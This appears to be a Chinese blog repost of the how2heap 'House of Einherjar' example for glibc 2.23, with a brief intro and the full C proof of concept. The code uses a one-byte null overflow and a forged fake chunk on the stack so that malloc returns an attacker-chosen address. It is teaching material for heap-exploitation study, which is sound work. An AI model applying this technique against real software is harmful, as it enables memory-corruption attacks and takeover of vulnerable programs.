how2heap-2.23-15-house_of_einherjar

2024-01-08 20:52
文章标签 15 house 2.23 einherjar how2heap

本文主要是介绍how2heap-2.23-15-house_of_einherjar,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

在学习完 how2heap-2.23-07-unsafe_unlink
再学习 how2heap-2.23-11-poison_null_byte时,想着在被poison_null_byte的chunk上方进行布局利用,当时想到的利用方式原来就是这个house_of_einherjar

在how2heap 的例子中,是将要合并的伪造chunk布置到栈上,并布局chunk,使合并后的伪造chunk成为top chunk,原理是一样的

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>/*Credit to st4g3r for publishing this techniqueThe House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc()This technique may result in a more powerful primitive than the Poison Null Byte, but it has the additional requirement of a heap leak. 
*/int main()
{setbuf(stdin, NULL);setbuf(stdout, NULL);printf("Welcome to House of Einherjar!\n");printf("Tested in Ubuntu 16.04 64bit.\n");printf("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");uint8_t* a;uint8_t* b;uint8_t* d;printf("\nWe allocate 0x38 bytes for 'a'\n");a = (uint8_t*) malloc(0x38);printf("a: %p\n", a);int real_a_size = malloc_usable_size(a);printf("Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);// create a fake chunkprintf("\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");printf("However, you can also create the chunk in the heap or the bss, as long as you know its address\n");printf("We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");printf("(although we could do the unsafe unlink technique here in some scenarios)\n");size_t fake_chunk[6];fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_sizefake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small binfake_chunk[2] = (size_t) fake_chunk; // fwdfake_chunk[3] = (size_t) fake_chunk; // bckfake_chunk[4] = (size_t) fake_chunk; //fwd_nextsizefake_chunk[5] = (size_t) fake_chunk; //bck_nextsizeprintf("Our fake chunk at %p looks like:\n", fake_chunk);printf("prev_size (not used): %#lx\n", fake_chunk[0]);printf("size: %#lx\n", fake_chunk[1]);printf("fwd: %#lx\n", fake_chunk[2]);printf("bck: %#lx\n", fake_chunk[3]);printf("fwd_nextsize: %#lx\n", fake_chunk[4]);printf("bck_nextsize: %#lx\n", fake_chunk[5]);/* In this case it is easier if the chunk size attribute has a least significant byte with* a value of 0x00. The least significant byte of this will be 0x00, because the size of * the chunk includes the amount requested plus some amount required for the metadata. */b = (uint8_t*) malloc(0xf8);int real_b_size = malloc_usable_size(b);printf("\nWe allocate 0xf8 bytes for 'b'.\n");printf("b: %p\n", b);uint64_t* b_size_ptr = (uint64_t*)(b - 8);/* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit*/printf("\nb.size: %#lx\n", *b_size_ptr);printf("b.size is: (0x100) | prev_inuse = 0x101\n");printf("We overflow 'a' with a single null byte into the metadata of 'b'\n");a[real_a_size] = 0; printf("b.size: %#lx\n", *b_size_ptr);printf("This is easiest if b.size is a multiple of 0x100 so you ""don't change the size of b, only its prev_inuse bit\n");printf("If it had been modified, we would need a fake chunk inside ""b where it will try to consolidate the next chunk\n");// Write a fake prev_size to the end of aprintf("\nWe write a fake prev_size to the last %lu bytes of a so that ""it will consolidate with our fake chunk\n", sizeof(size_t));size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);printf("Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;//Change the fake chunk's size to reflect b's new prev_sizeprintf("\nModify fake chunk's size to reflect b's new prev_size\n");fake_chunk[1] = fake_size;// free b and it will consolidate with our fake chunkprintf("Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");free(b);printf("Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);//if we allocate another chunk before we free b we will need to //do two things: //1) We will need to adjust the size of our fake chunk so that//fake_chunk + fake_chunk's size points to an area we control//2) we will need to write the size of our fake chunk//at the location we control. //After doing these two things, when unlink gets called, our fake chunk will//pass the size(P) == prev_size(next_chunk(P)) test. //otherwise we need to make sure that our fake chunk is up against the//wildernessprintf("\nNow we can call malloc() and it will begin in our fake chunk\n");d = malloc(0x200);printf("Next malloc(0x200) is at %p\n", d);
}

这篇关于how2heap-2.23-15-house_of_einherjar的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/584794

相关文章

Ilya-AI分享的他在OpenAI学习到的15个提示工程技巧

Ilya(不是本人,claude AI)在社交媒体上分享了他在OpenAI学习到的15个Prompt撰写技巧。 以下是详细的内容: 提示精确化:在编写提示时,力求表达清晰准确。清楚地阐述任务需求和概念定义至关重要。例:不用"分析文本",而用"判断这段话的情感倾向:积极、消极还是中性"。 快速迭代:善于快速连续调整提示。熟练的提示工程师能够灵活地进行多轮优化。例:从"总结文章"到"用

这15个Vue指令,让你的项目开发爽到爆

1. V-Hotkey 仓库地址: github.com/Dafrok/v-ho… Demo: 戳这里 https://dafrok.github.io/v-hotkey 安装: npm install --save v-hotkey 这个指令可以给组件绑定一个或多个快捷键。你想要通过按下 Escape 键后隐藏某个组件,按住 Control 和回车键再显示它吗?小菜一碟: <template

Adblock Plus官方规则Easylist China说明与反馈贴(2015.12.15)

-------------------------------特别说明--------------------------------------- 视频广告问题:因Adblock Plus的局限,存在以下现象,优酷、搜狐、17173黑屏并倒数;乐视、爱奇艺播放广告。因为这些视频网站的Flash播放器被植入了检测代码,而Adblock Plus无法修改播放器。 如需同时使用ads

15 组件的切换和对组件的data的使用

划重点 a 标签的使用事件修饰符组件的定义组件的切换:登录 / 注册 泡椒鱼头 :微辣 <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-

java基础总结15-面向对象11(抽象类)

下面通过一下的小程序深入理解抽象类 因此在类Animal里面只需要定义这个enjoy()方法就可以了,使用abstract关键字把enjoy()方法定义成一个抽象方法,定义如下:public abstract void enjoy();   从某种意义上来说,抽象方法就是被用来重写的,所以在父类声明的抽象方法一定要在子类里面重写。如果真的不想在子类里面重写这个方法,那么可以再在子类里

15年亚洲区长春站赛后总结

刷题打比赛的日子才叫青春   今年和ljy、lsj组队去长春站。这支队伍是我很放心的一支队伍,ljy可以做数学题和复杂思维题,lsj思维缜密可以和ljy对思路,我负责手速狗+模板暴力流。 有了去年两场亚洲区的经验,心态有了很大变化,也深知赛场上风云莫测,不至最后一分钟,仍未分胜负。开场的F题卡了很久,WA了很多发,这种复杂思维题丢给ljy和lsj搞了。我去开L题,给LJY说完题意后,他给

找不同-第15届蓝桥省赛Scratch初级组真题第4题

[导读]:超平老师的《Scratch蓝桥杯真题解析100讲》已经全部完成,后续会不定期解读蓝桥杯真题,这是Scratch蓝桥杯真题解析第183讲。 如果想持续关注Scratch蓝桥真题解读,可以点击《Scratch蓝桥杯历年真题》并订阅合集,查阅教程更方便。 第15届蓝桥杯省赛已于2024年8月24日落下帷幕,编程题一共有5题,分别如下: 猪八戒落地 游乐场 画西瓜 找不同 消

PHP 验证身份号码 包括15位18位

查了很多资料 发现网上身份证15位的验证并不是那么严谨  今天研究了一下  代码如下 <?phpfunction check_id_card($num){//老身份证长度15位,新身份证长度18位$length = strlen($num);if ($length == 15) { //如果是15位身份证//15位身份证没有字母if (!is_numeric($num)) {return fa

CSS学习15--元素的显示与隐藏

元素的显示与隐藏 前言一、display显示二、visibility可见性三、overflow溢出 前言 CCS中有三个显示和隐藏的单词比较常见,分别是display visibility和overflow。 他们的主要目的是让一个元素在页面中消失,但是不在文档源码中删除。最常见的是网站广告。 一、display显示 display设置或者检索对象是否以及如何显示。使用更多

15个多线程相关的面试题

大数据技术与架构 点击右侧关注,大数据开发领域最强公众号! 暴走大数据 点击右侧关注,暴走大数据! By 大数据技术与架构 场景描述:Java并发编程问题是面试过程中很容易遇到的问题,提前准备是解决问题的最好办法,将试题总结起来,时常查看会有奇效。 现在有T1、T2、T3三个线程,你怎样保证T2在T1执行完后执行,T3在T2执行完后执行? 这个线程问题通常会在第一轮或电话面试阶段被问到,